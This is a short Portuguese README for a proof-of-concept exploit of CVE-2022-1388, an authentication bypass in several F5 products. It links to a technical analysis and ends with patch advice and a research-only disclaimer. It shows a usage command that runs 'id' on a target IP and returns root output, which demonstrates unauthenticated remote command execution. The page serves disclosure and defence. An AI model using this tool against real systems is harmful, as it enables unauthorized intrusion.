
POC para CVE-2022-1388
POC para CVE-2022-1388 afetando vários produtos F5.
Uma análise técnica da causa raiz da vulnerabilidade pode ser encontrada em nosso blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Condições necessárias de uma requisição para explorar esta vulnerabilidade:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Atualize para a versão mais recente ou mitigue seguindo as instruções do Aviso de Segurança da F5
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.